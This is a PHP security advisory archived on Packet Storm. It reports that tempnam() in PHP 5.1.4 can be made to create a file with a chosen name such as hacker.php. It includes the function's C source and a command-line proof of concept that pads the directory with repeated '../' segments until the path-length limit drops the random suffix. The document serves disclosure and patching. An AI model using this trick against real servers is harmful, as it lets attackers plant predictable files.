what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

php5-tempnam.txt

php5-tempnam.txt
Posted Jun 14, 2006
Authored by Maksymilian Arciemowicz | Site securityreason.com

In PHP 5.1.4 it is possible to create a file with any name by exploiting a vulnerability in tempnam().

tags | advisory, php
SHA-256 | bab989edac8b4f3f2fbf7e79979276e58536f687cf9acdf27e2821d3ca064565

php5-tempnam.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
tempnam -- Create file with unique file name.

- --- 1. tempnam() Bypass unique file name ---
In lastes adv i have public an issue "Open Basedir Bypass". In function tempname() are required 2 arg`s.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

In PHP 5.1.4 exists bug that allows you to create file with any name.

- ---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE
- ---

You have created file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically added to filename.
Problem exists, because path couldn't be longer than MAXPATHLEN. In standard MAXPATHLEN is 1024B.

- -771-805---
PHP_FUNCTION(tempnam)
{
zval **arg1, **arg2;
char *d;
char *opened_path;
char *p;
int fd;
size_t p_len;

if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}

d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC);
if (p_len > 64) {
p[63] = '\0';
}

if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
close(fd);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(p);
efree(d);
}
- -771-805---

So if you create path like /www/../www/.. etc.

arg1+arg2=1023

uniqueid is not given to path.

Example:

- ---
cxib# php -r 'echo tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
www/../www/../www/temp/hacker.php
- ---

= /www/temp/hacker.php

- ---
cxib# ls -la /www/temp/hacker*
- -rw------- 1 cxib cxib 0 May 22 23:33 /www/temp/hacker.php
- -rw------- 1 cxib cxib 0 May 22 23:26 /www/temp/hacker.phpGQMqSE
- ---


- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEjGMW3Ke13X/fTO4RAl50AKCH7H7pDtfjTLcZ02+izd3P25fkvACfS7tK
tTnC41pJ3aQEAEvt580AqI0=
=ZfrH
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close